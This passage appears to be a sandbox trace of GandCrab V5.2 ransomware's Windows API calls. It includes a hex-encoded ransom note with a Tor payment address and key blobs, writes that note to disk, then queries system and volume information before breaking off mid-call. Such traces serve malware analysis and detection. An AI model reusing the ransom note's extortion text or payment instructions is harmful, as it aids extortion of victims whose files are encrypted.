[0072.456] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.456] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.457] CloseHandle (hObject=0x2bc) returned 1 [0072.457] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.458] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.458] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x309)) [0072.458] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.458] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.458] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.458] wsprintfW (in: 